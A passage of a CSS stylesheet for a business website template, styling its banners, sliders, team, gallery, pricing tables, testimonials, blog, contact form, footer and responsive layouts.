    -moz-box-shadow: 0 2px 10px -1px rgba(87, 97, 100, 0.35);
    box-shadow: 0 2px 10px -1px rgba(87, 97, 100, 0.35);
	padding:0px;
	}

.index5 .affix-top a{
	color:#000!important;
	}

.index5 .affix-top .active a{
	color:#07AAA5!important;
	}		
.index5 .affix-top .navbar-toggle .icon-bar {
    background-color: #222 !important;
}

 




/* ------------ Main Banner ------------ */
#main-slider { color:#fff;}
.tp-banner h2{
	font-size:54px;
}
.tp-banner p{
	font-size:18px;
}
.tp-banner p , #main-slider .tp-caption a{
	color:#fff;
}
#main-slider h2.tp-caption > span{
	display:block;
}
#main-slider .tp-caption a{
	margin:5px;
}
.tp-bullets{ display:none;} 
.tp-caption{ padding:0 15px !important;}


.layer-content p{
	color:#000;
	font-weight:400;
}

.layer-content h2{
	color:#000;
	font-weight:600;
}

.layer-content h2 span{
	color:#07AAA5;
	font-weight:600;
	display:inline-block!important;
}

.layer-content h2 span.green-text{
	color:#82b440;
}









/* ------------ Main Banner ------------ */



/* ------------ Banner With Text Rotator ------------ */
.text-rotator{
	background:url("../images/banner_text.jpg");
	padding-top:150px;
	background-size:cover;
	background-attachment:fixed;
	background-position:center center;
	width:100%;
}
.text-rotator #paralax-slider{
	padding:15% 0;
}
#paralax-slider .item-content p{
	font-size:20px;
}
#paralax-slider .item-content p ,#paralax-slider .item-content h2{
		color:#fff;
}
#paralax-slider .item-content h2{
	font-size:58px;
	margin-bottom:25px;
	font-weight:100;
}

#paralax-slider .owl-controls {
  margin-top:5%;
}
#paralax-slider .owl-controls .owl-page span{
	background: #fff; 
	text-align: center;
	height:12px;
	width:12px;
	border-radius:50%;
	opacity: 1;
}
#paralax-slider .owl-controls .owl-page span:hover,
#paralax-slider .owl-controls .active span{
    background:#6BB156;
}

ul.navbar-nav ul.dropdown-menu{
	border: none;
	left: 0;
	right: auto;
}
.navbar-default .navbar-nav li ul.dropdown-menu a{
	border: none !important;
	padding: 7px 20px;
	color: #000;
	font-size: 14px;
}

/* ------------ What We Offer ------------ */
#about{}	
#about .canvas-box{
	cursor: pointer;
}
#about .canvas-box span{
	display: inline-block;
	margin-bottom:15px;
	padding:5px;
}
#about .canvas-box span i{
  display: inline-block;
  font-size:50px;
}
.color1{ color:#07AAA5;}
.color2{ color:#99D8CC;}	
.color3{ color:#EC768C;}	
.color4{ color:#C183D6;}	
.color5{ color:#31AAE1;}
.color6{ color:#82B440;}			
#about .canvas-box:hover span i,
.counters-item:hover i,
.we-do .do-wrap:hover i{
	-moz-transform:scale(1.3);
	-ms-transform:scale(1.3);
	-o-transform:scale(1.3);
	-webkit-transform:scale(1.3);
	transform:scale(1.3);
}
#about .canvas-box:hover h4.color1{
	color:#07AAA5;
}
#about .canvas-box:hover h4.color2{
	color:#99D8CC;
}
#about .canvas-box:hover h4.color3{
	color:#EC768C;
}
#about .canvas-box:hover h4.color4{
	color:#C183D6;
}
#about .canvas-box:hover h4.color5{
	color:#31AAE1;
}
#about .canvas-box:hover h4.color6{
	color:#82B440;
}	
#about .canvas-box h4{
	margin-bottom:15px;
	color:#000;
}
/* ------------ What We Offer ------------ */



/* ------------ Paralax background ------------ */
#bg-paralax {
  background:url("../images/paralax-index1.jpg") no-repeat;
  color: #fff;
  padding:10% 0;
}
#bg-paralax , #testinomial{
  background-size:cover;
  background-position:center center;
  background-attachment:fixed;
  width:100%;
}

#bg-paralax p{
	margin-bottom:25px;
	color: #fff;
}
#bg-paralax h2{
	font-size:48px;
}
/* ------------ Paralax background ------------ */



/*  ------------ Counters Fact Info  ------------ */
#facts{}
#facts .counters-item{
	padding:26% 10%;
	font-weight:bold;
	vertical-align:middle;
	color:#fff;
	cursor:pointer;
}
#facts .counters-item h2{
	font-family: "Open Sans", sans-serif;
}	

.counters-item i {
  font-size:50px;
  display: block;
  margin-bottom:15px;
}
.counters-item p{
	color:#fff;
	text-transform: capitalize;
	font-weight:bold;
}
/*  ------------ Counters Fact Info  ------------ */




/*  ------------ Responsive Secvtion With Side Image  ------------ */
#responsive .responsive-pic{}
#responsive .responsive-pic > .col-md-6 > img{ margin-top:-42px;}
#responsive .responsive-pic > .col-md-6, #responsive .responsive-pic > .col-sm-6{
	padding-left:0;
}

#responsive .r-test h3 , #responsive .r-test h4{
	color:#222222;
}

#responsive .r-test h4{
	margin-top:40px;
	margin-bottom:20px;
}

.r-test ul.r-feature li {
  color: #1b1d1f;
  display: inline-block;
  padding-left:10px;
  text-transform: capitalize;
  width: 48%;
  margin-bottom:15px;
}

.r-test ul.r-feature li:before{
  content:'\f00c';
	font-family:'FontAwesome';
	display: inline-block;
   margin-right:10px;
   vertical-align: middle;
	color:#82B440;
}

.r-test .screens{
	margin-top:30px;
}

.r-test .screens i{
	display:inline-block;
	margin:0 3px;
}

.r-test .screens i:first-child{
	font-size:40px;
}

.r-test .screens i:nth-child(2){ font-size:30px; }

.r-test .screens i:last-child{ font-size:25px; }
/*  ------------ Responsive Secvtion With Side Image  ------------ */




/*  ------------ experties  ------------ */
.circliful {
  position: relative;
  float:left;
  margin-left:35px;
  margin-bottom:35px;
}

.circliful:first-child{
	margin-left:0;
}

.circle-text {
  background-color:#eee;
  bottom: 0;
  color: #636363;
  display: inline-block;
  height: 45px;
  left: 50%;
  line-height: 45px !important;
  margin: -22px auto 0 -22px;
  position: absolute;
  right: 50%;
  top: 50%;
  width: 45px;
  border-radius:100%;
}

.circliful p{
  bottom: -25px;
  left: 0;
  margin-top: 25px;
  position: absolute;
  right: 0;
}

.myStat2{
	width:20%;
}

.circle-info, .circle-info-half {
	color: #999;
}

.circliful .fa {
	margin: -10px 3px 0 3px;
	position: relative;
	bottom: 4px;
}
/*  ------------ experties  ------------ */




/*  ------------ What We Do ------------ */
.we-do .do-wrap{
	background:#fff;
	-webkit-box-shadow: 0 1px 1px 0 #ddd;
	-ms-box-shadow: 0 1px 1px 0 #ddd;
	box-shadow: 0 1px 1px 0 #ddd;
}
	
.we-do .do-wrap > .top{
	width:100%;
	height:72px;
	display:block;
}
.we-do .do-wrap span{
  border-radius: 100px;
  display: inline-block;
  height: 100px;
  margin-bottom: 40px;
  margin-top: -50px;
  width: 100px;
}
.we-do .do-wrap span i{
	color: #fff;
	font-size:50px;
	line-height: 99px;
	display:block;
}
.we-do .do-wrap h4{
	margin-bottom:15px;
}		
.we-do .do-wrap p,
.white-box p{
	margin:0 15px;
}
.we-do .do-wrap a{
	margin:35px 0;
	text-decoration:none;
	position:relative;
}
.we-do .do-wrap a:before,
.thinkers .thinker-wrap ul.social-contact li a:before,
.index_2#publication .wrap-pulication a:before{
  content: "";
  height: 2px;
  left: 0;
  opacity: 0;
  filter: alpha(opacity=0);
  position: absolute;
  top:100%;
  transform: translateY(-20px);
  -ms-transition: all 0.3s linear 0.1s;
  -webkit-transition: all 0.3s linear 0.1s;
  transition: all 0.3s linear 0.1s;
  width: 100%;
	
}
.we-do .do-wrap a:hover::before, .we-do .do-wrap a:focus::before{
	 opacity:1;
	 filter: alpha(opacity=100);
	 transform: translateY(0px);
	 -ms-transform:translateY(0px);
}
.we-do .do-wrap a.green-text:hover::before, .we-do .do-wrap a.green-text:focus::before{
	background:#74c8b8;
}
.we-do .do-wrap a.green-text:hover, .we-do .do-wrap a.green-text:focus{
	color:#74c8b8;
}
.we-do .do-wrap a.pink-text:hover::before, .we-do .do-wrap a.pink-text:focus::before{
	background:#ec768c;
}
.we-do .do-wrap a.pink-text:hover, .we-do .do-wrap a.pink-text:focus{
	color:#ec768c;
}
.we-do .do-wrap a.purple-text:hover::before, .we-do .do-wrap a.purple-text:focus::before{
	background:#c183d6;
}
.we-do .do-wrap a.purple-text:hover, .we-do .do-wrap a.purple-text:focus{
	color:#c183d6;
}
.we-do .do-wrap a.blue-text:hover::before, .we-do .do-wrap a.blue-text:focus::before{
	background:#31aae1;
}
.we-do .do-wrap a.blue-text:hover, .we-do .do-wrap a.blue-text:focus{
	color:#31aae1;
}
.we-do .do-wrap:hover .top, we-do .do-wrap:focus .top, .we-do .do-wrap:hover span, .we-do .do-wrap:focus span{
	background:#82b440;
	
}	

/* ------------ What We Do ------------ */




/* ------------  Our Creative Thinkers ------------  */
.thinkers .thinker-wrap img, #publication-slider .item .image img{
	width:100%;
	-moz-transition:all .2s linear;
	-ms-transition:all .2s linear;
	-o-transition:all .2s linear;
	-webkit-transition:all .2s linear;
	transition:all .2s linear;
}
.thinker-wrap p{
	margin:0 10px;
}
.thinker-image{
	width:100%;
	overflow:hidden;
	position:relative;
}
.thinker-image .overlay{
	background:rgba(7,170,165,.75);
	position:absolute;
	width:100%;
	bottom:0;
	top: auto;
	opacity:0;
	filter: alpha(opacity=0);
	left:0;
	right:0;
	cursor:pointer;
   padding:0;
	height:80px;
	-moz-transform:translateY(100%);
	-ms-transform:translateY(100%);
	-webkit-transform:translateY(100%);
	transform:translateY(100%);
}
.thinker-image .overlay.pink{
	background:rgba(236,118,140,.75);
}
.thinker-image .overlay.green{
	background:rgba(130,180,64,.75);
}	
.thinker-image:hover .overlay{
	opacity:1;
	filter: alpha(opacity=100);
	-moz-transform: translateY(0%);
	-ms-transform: translateY(0%);
	-webkit-transform: translateY(0%);
	transform: translateY(0%);
}

.thinker-image .overlay ul.social-link li a{
	border: 1px solid #fff;
}
.thinker-image .overlay ul.social-link li a > i{
	color: #fff;
}
.thinker-image .overlay ul.social-link li a:hover > i{
	color: #121416;
}
.thinker-image .overlay ul.social-link li a:hover span{
	background: #fff;
	border:1px solid #fff;
}
.thinker-wrap:hover .thinker-image img,  #publication-slider .item:hover .image img
{
	transform:scale(1.05);
	
	-webkit-transition: all 0.3s ease-in-out ;
   -moz-transition:all 0.3s ease-in-out ;
	-ms-transition:all 0.3s ease-in-out ;
   -o-transition:all 0.3s ease-in-out ;
	transition:all 0.3s ease-in-out;
}
.thinkers .thinker-wrap h3{  
	margin-top:20px;
	font-size:20px;
}
.thinkers .thinker-wrap small{
  color: #838383;
  display: inline-block;
  margin: 5px 0 15px;
}

.thinkers .thinker-wrap ul.social-contact li{
	display:inline-block;
}

.thinkers .thinker-wrap ul.social-contact li a{
	font-weight:bolder;
	color:#222222;
	margin:0 8px;
	text-transform:uppercase;
	position:relative;
	padding-bottom:3px;
}
.thinkers .thinker-wrap ul.social-contact li a:hover::before{
	 opacity:1;
	 filter: alpha(opacity=100);
	 transform: translateY(0px)
	
}
.thinkers .thinker-wrap ul.social-contact li a:hover.facebook{
	color:#3b5998 !important;
}

.thinkers .thinker-wrap ul.social-contact li a:hover.facebook::before{
	background: #3b5998;
}

.thinkers .thinker-wrap ul.social-contact li a:hover.twitter{
	color:#1da1f2;
}

.thinkers .thinker-wrap ul.social-contact li a:hover.twitter::before{
	background: #1da1f2;
}

.thinkers .thinker-wrap ul.social-contact li a:hover.linkden{
	color:#0077B5;
}

.thinkers .thinker-wrap ul.social-contact li a:hover.linkden::before{
	background: #0077B5;
}
/* ------------  Our Creative Thinkers ------------  */




/* ------------  Gallery Filter ------------  */
#project{
	padding-top:5%;
	background:#f8f8f8;
}
.work-filter {
	margin-bottom:50px;
}

.work-filter ul li {
    display: inline-block;
}

.work-filter ul li a {
  color: #222222;
  display: block;
  font-size:15px;
  padding:6px 10px;
  text-transform: capitalize;
  border-bottom:1px solid #909090;
  border-top:1px solid #909090;
  border-left:1px solid transparent;
  border-right:1px solid transparent;
  cursor: pointer;
}
.work-filter ul li a:hover,
.work-filter ul li a.active:hover{
  background-color:#07AAA5;
  border:1px solid #07AAA5;
  color: #fff;
}
.work-filter ul li a.active {
  background-color: #82b440;
  border:1px solid #82b440;
  color: #fff;
}

.mix {
    display: none;
}

.index_2 .work-item {
    width:20%;
}

.work-item {
	height:auto;
	width:auto;
	float:left;
   position: relative;
	overflow:hidden;
}

.work-item > img {
  display: block;
  height: auto;
  max-width: 100%;
  width:100%;
}
.item-containe > img{
  -webkit-transition: all 0.7s ease 0s;
   -moz-transition:all 0.7s ease 0s;
	-ms-transition:all 0.7s ease 0s;
   -o-transition:all 0.7s ease 0s;
	transition:all 0.7s ease 0s;
}
.item-container:hover  img{
	transform:scale(1.2);
	
	-webkit-transition: all 0.3s ease-in-out ;
   -moz-transition:all 0.3s ease-in-out ;
	-ms-transition:all 0.3s ease-in-out ;
   -o-transition:all 0.3s ease-in-out ;
	transition:all 0.3s ease-in-out;
}

.overlay {
	background-color:rgba(255,255,255,.8);
	position: absolute;
	left:10px;
	top:10px;
	bottom:10px;
	right:10px;
	width:auto;
	height:inherit;
	color: #222222;
	opacity: 0;
	filter: alpha(opacity=0);
	padding:2%;
	z-index:1;
}

.overlay-inner{
  margin: auto;
  position: absolute;
  top: 50%;
  -moz-transform: translateY(-50%);
  -ms-transform: translateY(-50%);
  -webkit-transform: translateY(-50%);
  transform: translateY(-50%);
  width: 100%;
}

.item-container:hover .overlay {
	opacity: 1;
	filter: alpha(opacity=100);
}
.work-item:hover .line{
	width:40%;
}
.overlay h4.color{ color:#07AAA5;}
.overlay h4.base{ color:#82A75E;}

.work-item .overlay p{
	font-size:14px;
}
.overlay .line{
	width:0%;
}
.overlay .line ,
.product-content .line{
	height:1px;
	margin:15px auto;
	background-color:#000;
	-webkit-transition: all 500ms ease-out;
	-moz-transition: all 500ms ease-out;
	-o-transition: all 500ms ease-out;
	transition: all 500ms ease-out;					 
}
/* ------------  Gallery Filter ------------  */




/* ---------- Pricing Tables ---------- */
.pricing {
	display: -webkit-flex;
	display: flex;
	-webkit-flex-wrap: wrap;
	flex-wrap: wrap;
	-webkit-justify-content: center;
	justify-content: center;
	width: 100%;
	margin: 0 auto;
}

.pricing_item {
	position: relative;
	display: -webkit-flex;
	display: flex;
	-webkit-flex-direction: column;
	flex-direction: column;
	-webkit-align-items: stretch;
	align-items: stretch;
	text-align: center;
	-webkit-flex: 0 1 330px;
	flex: 0 1 330px;
}
.pricing_list {
	text-align: left;
}
.pricing_tenzin .pricing_item {
	margin: 1em;
	padding: 2em 1em;
	text-align: left;
	color: #262b38;
	background: #EEF0F3;
	border-top: 3px solid;
	-webkit-transition: border-color 0.3s;
	transition: border-color 0.3s;
	margin-top:0;
}
.pricing_tenzin .pricing_item.pink{
	border-color:#EC768C;
}	
.pricing_tenzin .pricing_item.blue{
	border-color:#07AAA5;
}
.pricing_tenzin .pricing_item.pink .pricing_action{
	background:#EC768C;
}
.pricing_tenzin .pricing_item.blue .pricing_action{
	background:#07AAA5;
}
.pricing_tenzin .pricing_item.active{
	border-color: #82B440;
}
/*.pricing_tenzin .pricing_item.active:hover{
	border-color: #07AAA5;
} */
.pricing_tenzin .pricing_title {
	font-size: 1em;
	margin: 0 0 1em;
}
.pricing_item:hover .pricing_action{
	border:1px solid transparent;
	background:#82b440 !important;
}
.pricing_tenzin .pricing_price {
	font-size: 2em;
	padding: 0.5em 0 0.75em;
	border-top: 3px solid rgba(139, 144, 157, 0.18);
}

.pricing_tenzin .pricing_currency {
	font-size: 0.5em;
	vertical-align: super;
}

.pricing_tenzin .pricing_sentence {
	font-weight: bold;
	padding: 0 0 0.5em;
	color: #9CA0A9;
	border-bottom: 3px solid rgba(139, 144, 157, 0.18);
}

.pricing_tenzin .pricing_list {
	font-size:14px;
	padding:25px 0;	
	color: #8b909d;
}
.pricing_tenzin .pricing_list li{
	margin-bottom:8px;
}
.pricing_tenzin .pricing_list li:before{
	content:'\f00c';
	font-family:'FontAwesome';
	display: inline-block;
   margin-right:10px;
   vertical-align: middle;
	color:#82B440;
}

.pricing_tenzin .pricing_action {
	font-weight: bold;
	margin-top: auto;
	padding: 1em 2em;
	color: #fff;	
	-webkit-transition: background-color 0.3s ease-in-out;
	transition: background-color 0.3s ease-in-out;
	border:1px solid transparent;

 }
.pricing_item.active .pricing_action{
	border:1px solid transparent;
	background:#82b440;
}
.pricing_item.active:hover .pricing_action{
	border:1px solid transparent;
	background:#07AAA5 !important;
}	
/* ---------- Pricing Tables ---------- */



/* ------------ Testinomials ------------ */
#testinomial{
	background:url(../images/bg-testinomial.jpg) no-repeat;
	color:#fff;
}
#testinomial h2{ color:#82B440; }
#testinomial p{ color:#fff; }
#testinomial-slider .item{
  display: block;
  width: 100%;
  height: auto;
  color:#fff;
}

#testinomial-slider .item p {
  font-size: 20px;
  margin-left: 13%;
  margin-right: 13%;
}

#testinomial-slider .item h5{ 
	font-size:14px; 
	text-transform:uppercase; 
	margin-top:40px; 
	margin-bottom:15px;
}

#testinomial-slider .owl-prev,
#testinomial-slider .owl-next{
	border:1px solid #fff;
	color:#FFF;
}

#testinomial-slider .owl-prev,
#testinomial-slider .owl-next ,
#publication-slider .owl-prev ,
#publication-slider .owl-next {
	top:40%;
	position:absolute;
	background:transparent;
	height:38px;
	width:38px;
	-ms-border-radius:38px;
	-webkit-border-radius:38px;
	border-radius:38px;
	font-size:30px;
	line-height:20px;
	opacity:1;
	filter: alpha(opacity=100);
}

#testinomial-slider .owl-prev:hover,
#testinomial-slider .owl-next:hover ,
#publication-slider .owl-prev:hover ,
#publication-slider .owl-next:hover{
	border:1px solid #82b440;
	background-color:#82b440;
	color:#fff;
	-webkit-transition: background 0.3s linear 0.1s;
	-ms-transition: background 0.3s linear 0.1s;
	transition: background 0.3s linear 0.1s;
}
#testinomial-slider .owl-prev{
	left:0;
}
#testinomial-slider .owl-next{
	right:0;
}
/* ------------ Testinomials ------------ */



/* ------------  Publications ------------ */
#publication{}
#publication-slider .item{
  margin:0 15px;
}
#publication-slider .item:hover{
	cursor:pointer;
}	
#publication-slider .item .image{
	overflow: hidden;
  position: relative;
  width: 100%;
}

#publication-slider .item > img{
  display: block;
  width: 100%;
  height: auto;
}
#publication-slider .item h5{
	font-size:14px;
	color:#727272;
	margin-top:25px;
}
#publication-slider .item h5 , #publication-slider .item h4{
	margin-bottom:10px;
}
#publication-slider .item h4{
	font-size:20px;
	color:#222222;
}
#publication-slider .item  a.name{
	color:#222222;
}

#publication-slider .item  a.name ,
#publication-slider .item  a.comment{
	font-size:15px !important;
	margin-bottom:10px;
	display:inline-block;
	text-transform:none;
}
#publication-slider .item  a.comment{
	color:#82b440;
}
#publication-slider .item  a.comment:before{
	content:'';
	background:transparent;
}
#publication-slider .item p > a{
	font-size:15px;
}
#publication-slider .item > a{
	color:#000;
	position:relative;
	font-size:13px;
	font-weight:bold;
	text-transform: uppercase;
}
#publication-slider .item > a:hover{
	color:#82b440;
}
#publication-slider .owl-prev ,
#publication-slider .owl-next{
	border:1px solid #7a7a7a;
	color:#7a7a7a;
}
#publication-slider .owl-prev{
	left:-5%;
}

#publication-slider .owl-next{
	right:-5%;
}
/* ------------  Publications ------------ */



/* ------------ Slogan Text with Button ------------ */
#slogan{
	background:#82b440;
	padding:25px 0;
	color:#fff;
	margin-top:-2px;
	width:100%;
}
#slogan a{
  padding: 15px 35px;
  border:1px solid #fff;
  color:#000;
  background:#fff;
  font-weight:bold;
  text-transform: capitalize;
}

#slogan p {
  color: #fff;
  font-size: 20px;
  margin: 10px 0;
}
/* ------------ Slogan Text with Button ------------ */



/* ------------ Contact Us ------------ */
#contact .center h2,
#contact .center .margen{
	margin-bottom:45px;
}
#contact .center a{
	color:#82b440;
}

#contact .center ul.social-link{
	margin-top:45px;
}


#contact .form-inline{
	margin-top:45px;
}
.form-control:focus {
  border-color: #82b440 !important;
  box-shadow:none;
  transition: all 0.2s ease-in 0s;
}

#contact .form-inline .col-md-6,
#contact .form-inline .col-md-12{
	padding-left:5px;
	padding-right:5px;
}


#contact .form-inline .form-control, #contact .form-inline textarea {
  border: 1px solid #d0d0d0;
  border-radius: 0;
  color: #4c4c4c;
  font-size: 14px;
  padding: 15px;
  width: 100%;
}

#contact .form-inline .form-control{
	height:45px;
}

#contact .form-inline .form-control,
#contact .form-inline textarea{
	margin-bottom:10px;
}

#contact .form-inline textarea{
	margin-top:0;
	min-height:210px;
}
#contact .form-inline .btn-black{
	width:100%;
	color:#fff;
	
}	
#contact .form-inline input[type="submit"]{
	width:100%;
	height:100%;
	background-color:transparent;
}
/* ------------ Contact Us ------------ */




/* ---------- Footer  ---------- */
footer{
	background:#121416;
	padding:35px 0;
	position:relative;
}
footer p{
	margin:0;
	color:#a6a6a6;
	font-size:14px;
}
footer .breadcrumb{
	background-color:transparent;
	padding:0;
}

footer .breadcrumb li a {
  text-shadow: none;
  color:#fff;
	font-size:14px;
	position:relative;
}
footer .breadcrumb li a:hover, footer .breadcrumb li a:focus{
  color: #82b440;
}

.go-top {
  bottom:20px;
  position: fixed;
  font-size:20px;
  right:25px;
  z-index:800;
  background:#82b440;
  color:#fff;
  border-radius:5px;
  height:40px;
  width:40px;
  text-align:center;
  line-height:40px;
  opacity:0;
}
.go-top:hover, .go-top:focus{
	background:#07AAA5;
	color:#fff;
}
.go-top.show {
    opacity: 1;
}
/* ---------- Footer  ---------- */





 ul.social-link li a{
	display: inline-block;
	margin: 0 2px;
}

 ul.social-link li{
	margin-top:10px;
	display:inline-block;
}

 ul.social-link li a {
  border: 1px solid #000;
  border-radius: 44px;
  font-size: 20px;
  height: 44px;
  width: 44px;
  position:relative;
  color: #000 !important;
}

 ul.social-link li a span{
	border-radius: 0;
	display: block;
	height: 0;
	left: 50%;
	margin: 0;
	position: absolute;
	top: 50%;
	-webkit-transition: all 0.3s;
	-moz-transition: all 0.3s;
	-o-transition: all 0.3s;
	transition: all 0.3s;
	width: 0;
}

 ul.social-link li a:hover span {
  background: #82b440;
  border-radius:44px;
  height:44px;
  width:44px;
  border: 1px solid #82b440;
  height:44px;
  top: -1px;
  left: -1px;
  right: 0;
  bottom: 0;
}
 ul.social-link li a i {
  height: 100%;
  left: 0;
  line-height: 42px;
  position: absolute;
  top: 0;
  transition: all 0.3s ease 0s;
  width: 100%;
  z-index: 10;
}

 ul.social-link li a :hover,  ul.social-link li a:focus{
	color:#fff;
	 border: none;
}



/* ========================= Alert Classes ==================== */ 

.alert-success {
	line-height:24px;
	margin-bottom:15px;
	padding:5px;
	
	}
	
.alert-danger {
	line-height:24px;
	margin-bottom:15px;
	padding:5px;
	
}	






 



/*=========================================*/
          /* Blog WIth All Versions*/
/*=========================================*/
#area-main{}
.blog-wrap{
	background-color:#fff;
	width:100%;
	position:relative;
	overflow:hidden;
}

.blog-wrap .blog-content {
  display: table-cell;
  padding:6.5em 0;
}

.blog-content-bg {
  background-color: #fff;
  margin: 0 auto;
  padding:30px 30px 5px;
  position: relative;
  top: -60px;
  width: 95%;
}

.blog-item-v3.catItemView{
	border-bottom: 1px solid #d1d2d2;
	padding-bottom:70px;
	margin-bottom:70px;
}

.blog-item-v3 > img{
	margin-bottom:35px;
}

.blog-item-v3 .blog-content {
	padding:0;
}

.no-margin{ margin:0; border:none;}
#area-main h3{
	color:#1b1d1f;
}

#area-main p{
	color:#1b1d1f;
}

#area-main a.readmore{
	color:#fff;
	padding:10px 35px;
	background:#1b1d1f;
	border:1px solid transparent;
	display:inline-block;
	text-decoration:none;
	margin-top:20px;
}

#area-main a.readmore:hover, #area-main a.readmore:focus{
	border:1px solid #82b440;
}

#area-main ul.blog-author{
	margin:20px 0 25px;
}

#area-main ul.blog-author li{
	display:inline-block;
}

#area-main ul.blog-author li a{
	color:#696969;
	font-size:14px;
	margin-right:15px;
}

#area-main ul.blog-author li a .fa{
	margin-right:5px;
}

#area-main ul.blog-author li a:hover, #area-main ul.blog-author li a:focus{
	color:#82b440;
}

.morepost-wrap{
	margin-top:75px;
	border-top:1px solid #d1d2d2;
}

.morepost-wrap2{
	border-top:1px solid #d1d2d2;
	border-bottom:1px solid #d1d2d2;
	padding-bottom:25px;
}

.morepost-wrap a:hover ,
.morepost-wrap2 a:hover{
	color:#82b440;
}

.morepost-wrap .morepost ,
.morepost-wrap2 .morepost{ 
  font-size:16px;
  color:#696969;
  margin-top:25px;
  display:inline-block;
  position: relative;
}

.morepost-wrap2 .morepost .fa-long-arrow-left,
.morepost-wrap .morepost .fa-long-arrow-left{
	right:0;
}

.morepost-wrap2 .morepost:hover .fa-long-arrow-left,
.morepost-wrap .morepost:hover .fa-long-arrow-left{
	opacity:1 !important;
	filter: alpha(opacity=100);
   color:#82b440;
	right:100%;
}

.morepost-wrap2 .morepost .fa-long-arrow-left,
.morepost-wrap2 .morepost .fa-long-arrow-right,
.morepost-wrap .morepost .fa-long-arrow-left , 
.morepost-wrap .morepost .fa-long-arrow-right{
	color: transparent;
	pointer-events: none;
   position: absolute;
   text-shadow: 0 0 transparent;
   top:25%;
   transform: translateX(-50%);
   transition: text-shadow 0.3s ease 0s, color 0.3s ease 0s;
  -webkit-transition: all 0.3s ease 0s;
	-ms-transition: all 0.3s ease 0s;
	transition: all 0.3s ease 0s;
	opacity:0 !important;
	filter: alpha(opacity=0);
}

.morepost-wrap2 .morepost .fa-long-arrow-right,
.morepost-wrap .morepost .fa-long-arrow-right{
  left:0%;
  margin-left:5px;
}

.morepost-wrap2 .morepost:hover  .fa-long-arrow-right,
.morepost-wrap .morepost:hover .fa-long-arrow-right{
	opacity:1 !important;
	filter: alpha(opacity=100);
   color:#82b440;
	left:110%;
}

.blog-content-pic{}
.blog-content-pic img{ width:100%;}
.blog-item .blog-content{
	padding:0;
	margin:35px 0;
}

.blog-item .blog-content p{
	margin-bottom:25px;
}

.blog-item blockquote{
	color:#82b440;
}

.blog-item .post-tag{
	border:1px solid #d9d9d9;
	padding:5px;
	margin-bottom:70px;
}

#area-main .tag-cloud li {
  display: inline-block;
  margin: 6px;
}

#area-main .tag-cloud li a{
	 display:block;
}

#area-main .tag-cloud li a , .blog-reply a.btn-rep{
    background:#efefef;
    color: #1b1d1f;
	 font-size:12px;
    padding: 8px 15px;
	 text-transform:uppercase;
}
#area-main .tag-cloud li a:hover , #area-main .tag-cloud li a:focus ,
.blog-reply a.btn-rep:hover,.blog-reply a.btn-rep:focus{
    background:#82b440;
    color: #fff;
	 -webkit-transition: all 500ms linear;
   -moz-transition: all 500ms linear;
	-ms-transition: all 500ms linear;
   -o-transition:all 500ms linear;
	transition:all 500ms linear;
}

.blog-item ul.social-link li{ margin:0; }
.blog-item ul.social-link li a > i{
	color: #1b1d1f;
}
.blog-item ul.social-link li a > i:hover{
	color: #fff;
}
.blog-reply{
	padding:10px;
	border:1px solid #f3f3f3;
	position:relative;
	margin:20px 0;
}
.blog-reply h4{
	color:#1b1d1f;
	margin-bottom:8px;
	text-transform:capitalize;
}
.blog-reply a.btn-rep{
	position:absolute;
	top:0;
	right:0;
}

.blog-item .post-comment h3{
	margin-bottom:35px;
	margin-top:70px;
}

.blog-item .post-comment form .form-control,
.contact form .form-control{
	height:50px;
}

.blog-item .post-comment form .form-control,
.contact form .form-control,
.blog-item .post-comment form textarea,
.contact form textarea,
.index_3 .form-inline .form-control,
.index_3 .form-inline textarea{
  padding:15px;
  font-size:14px;
  color:#4c4c4c;
  border:1px solid #d0d0d0;
  width:100%;
  border-radius:0;
}

.blog-item .post-comment form textarea, 
.contact form textarea{
	margin:30px 0;
	min-height:210px;
}

.blog-item .post-comment form input[type="submit"] , 
.contact form input[type="submit"]{
	background:#82b440;
	border:1px solid transparent;
	font-weight:bold;
	color:#fff;
	height:50px;
	width:185px;
	position:relative;
}
.blog-item .post-comment form input[type="submit"]:hover , 
.contact form input[type="submit"]:hover{
	background:#1b1d1f;
}
 
.widget{
	margin-bottom:40px;
	color:#1b1d1f;
}

.widget h4 , .widget img{
	margin-bottom:25px;
}
.widget > img{
	width:100%;
}

.search_box input {
  border: 1px solid #d9d9d9;
  height: 53px;
  padding-left: 15px;
  position: relative;
  width: 100%;
  font-size:14px;
}

.search_box i {
  border-left: 1px solid #d9d9d9;
  bottom: 0;
  color: #d9d9d9;
  font-size: 24px;
  height: 53px;
  padding: 15px;
  position: absolute;
  right: 15px;
  top: 0;
  cursor:pointer;
}

ul.category li{
	margin-top:15px;
	display:block;
}

ul.category li a{
	color:#1b1d1f;
	font-size:16px;
	border-bottom:1px solid #d9d9d9;
	padding-bottom:15px;
	display:block;
	text-transform:capitalize !important;
}
ul.category li a:hover , ul.category li a:focus{
	color:#82b440;
}

ul.category li a .date{
	color:#82b440;
	font-size:12px;
	display:block;
}

/*=========================================*/
          /* Blog Ends */
/*=========================================*/




          /* Inner Pages Top*/
.innerpage-banner {
	background: no-repeat center center / cover;
	padding-top: 200px;
	max-height:440px;
	border-bottom: 5px solid rgba(0,0,0,0.9);
	color: #fff;
	
}
.tagline {
	color: #fff;
	text-transform: uppercase;
	font-size: 14px;
}




@media screen and (max-width: 1299px){
    .navbar-default .navbar-nav > li{
		  margin: 0 20px;
	  }
	.info-section .bg{
		padding-top:100%;
	}
	.blog-wrap .blog-content {
	  padding: 3.5em 0;
	}
	
	 .layer-content-responsive {
		max-height:400px !important;
		overflow:hidden;
	}
}


@media screen and (max-width: 1024px){
	
	h2{ font-size:36px; }
	h3{ font-size:20px; }
	h4{ font-size:16px; }
	
}

@media screen and (max-width: 1000px){
	 
.navbar-default .navbar-nav > li {
	margin: 0 6px;
}
.navbar-default .navbar-nav > li > a {
  letter-spacing: 0;
}
.text-rotator {
  padding-top:150px;
}
#paralax-slider .item-content p{
  font-size:16px;
}
#paralax-slider .item-content h2 {
  font-size:46px;
  margin-bottom:10px;
}
.r-test ul.r-feature li {
font-size: 12px;
}
.we-do .do-wrap, .white-box {
margin-bottom:30px;
}
.pricing_item {
flex: 0 1 320px;
}
#bg-paralax , #testinomial, .text-rotator{
  background-position:center center !important;
}	
#slogan{
text-align:center;
}
#slogan p{s
font-size:16px;
}	
#slogan a.pull-right {
float: none !important;
margin-top: 30px;

}


		
}



@media screen and (max-width: 767px){

  h2{ font-size:30px; }
  #main-navigation{ background-color: #1b1d1f; }
  
  .navbar-brand, #navigation.affix .navbar-brand{ display:inline-block;  padding: 10px 0;}
